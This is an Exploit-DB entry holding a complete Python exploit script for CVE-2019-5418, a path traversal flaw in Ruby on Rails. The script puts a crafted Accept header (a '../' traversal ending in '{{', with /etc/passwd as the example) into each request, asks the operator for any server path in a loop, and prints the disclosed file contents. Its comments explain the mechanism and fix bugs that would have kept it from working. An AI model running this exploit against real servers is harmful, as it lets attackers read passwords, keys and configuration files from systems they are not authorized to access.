Rails 5.2.1 – Arbitrary File Content Disclosure

  • Author: NotoriousRebel
    Date: 2019-03-21
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/46585/
  • '''
    Exploit Title: File Content Disclosure on Rails
    Date: 2019-03-20 (the author notes the CVE was disclosed on 2019-03-16)
    Exploit Author: NotoriousRebel
    Vendor Homepage: https://rubyonrails.org/
    Software Link: https://github.com/rails/rails
    Version: all Rails releases before the fixed versions are affected; fixed in 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2 and 4.2.11.1
    Tested on: Rails 5.2.1 (Using ubuntu on linux subsystem for Windows)
    CVE: 2019-5418
    '''
    import sys
    
    try:
    import requests
    except ImportError:
    print('\n\033[93m[!] Requests library not found, please install before proceeding.\n\n \033[0m')
    sys.exit(1)
    
    
    def banner():
        """Print the tool banner to stdout.

        Purely cosmetic: names the CVE this script targets. Returns None.
        """
        print("""
    ----------------------------------------------
    Arbitrary Traversal exploit for Ruby on Rails
    CVE-2019-5418
    ----------------------------------------------
    """)
    
    def check_args():
        """Exit with status 1 unless exactly one positional argument (the target URL) was given.

        On a wrong argument count a short error and usage line are printed to
        stdout before exiting; otherwise the function returns None.
        """
        if len(sys.argv) == 2:
            return
        print("Invalid number of arguments entered!")
        print('Use as:', "python3 Bandit.py url")
        sys.exit(1)
    
    
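    def check_url(url, timeout=10):
        """Exit with status 1 unless *url* answers an HTTP GET with status 200.

        Args:
            url: Base URL of the target (e.g. ``http://host:3000/``).
            timeout: Seconds to wait for connect/read before giving up, so an
                unresponsive host cannot hang the tool indefinitely.

        Returns None when the target responds 200. A 200 here is only a
        liveness check: per the Rails advisory, CVE-2019-5418 is triggered by
        a route that calls ``render file:``, which the base URL may or may not
        do, so a passing check does not mean the target is vulnerable.
        """
        try:
            response = requests.get(url, timeout=timeout)
        except requests.RequestException:
            # Connection refused, DNS failure, timeout: treat like an unreachable URL.
            print("Url is invalid or can not be reached!")
            sys.exit(1)
        # Bug fix: the original compared the Response object itself to 200,
        # which is never equal, so every URL was rejected. Compare the code.
        if response.status_code != 200:
            print("Url is invalid or can not be reached!")
            sys.exit(1)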
    
    
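    def read_file(url, file, timeout=10):
        """Send one CVE-2019-5418 probe: GET *url* with a crafted ``Accept`` header.

        Per the Rails advisory, vulnerable versions let the ``Accept`` header
        influence the path used by ``render file:``, so a value such as
        ``../../../../etc/passwd{{`` makes the server read that file from disk
        and return its contents as the response body. The ``{{`` suffix keeps
        Rails from treating the value as a normal MIME type; the caller
        supplies the ``../`` traversal prefix, which must be relative to the
        application's view directory.

        Args:
            url: Target URL of a route that renders a file.
            file: Server-side path (with leading ``../`` components) to read.
            timeout: Seconds to wait before giving up on the request, so a
                dead target raises ``requests.RequestException`` instead of
                blocking the interactive loop forever.

        Returns:
            The ``requests.Response``. Its ``.text`` is the disclosed file when
            the target is vulnerable, otherwise the route's normal body.
        """
        headers = {'Accept': file + '{{'}
        return requests.get(url, headers=headers, timeout=timeout)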
    
    
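    def main():
        """Interactive driver: read server paths from stdin and print each disclosed file.

        Usage: ``python3 Bandit.py <url>``. Every answer to the prompt is sent
        to ``read_file`` as the crafted Accept header and the response body is
        printed verbatim. Type ``quit`` (any case) or press Ctrl-D to stop;
        blank lines are ignored. Note that ``check_url()`` exists in this file
        but is not called here, so requests are sent whether or not the base
        URL answers.
        """
        banner()
        check_args()
        url = sys.argv[1]
        # Python 2 has raw_input(); Python 3 renamed it to input(). Resolve
        # that once up front. The original tried input() first and caught
        # every exception: on Python 2 that eval()s the operator's typed text,
        # and on Python 3 an EOF (Ctrl-D) fell through to a NameError traceback.
        try:
            prompt = raw_input
        except NameError:
            prompt = input
        while True:
            try:
                path = prompt("Enter file to read (enter quit to exit): ")
            except EOFError:
                break
            if not path.strip():
                continue
            if path.lower() == 'quit':
                break
            # requests' RequestException subclasses IOError, so a timeout or
            # refused connection is reported and the session continues.
            try:
                response = read_file(url, path)
            except IOError as exc:
                print('[!] Request failed: %s' % exc)
                continue
            print(response.text)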
    
    
    if __name__ == '__main__':
        # Entry point: run the interactive loop and report a Ctrl-C instead of
        # dumping a KeyboardInterrupt traceback.
        interrupted_msg = '\n\n\033[93m[!] ctrl+c detected from user, quitting.\n\n \033[0m'
        try:
            main()
        except KeyboardInterrupt:
            print(interrupted_msg)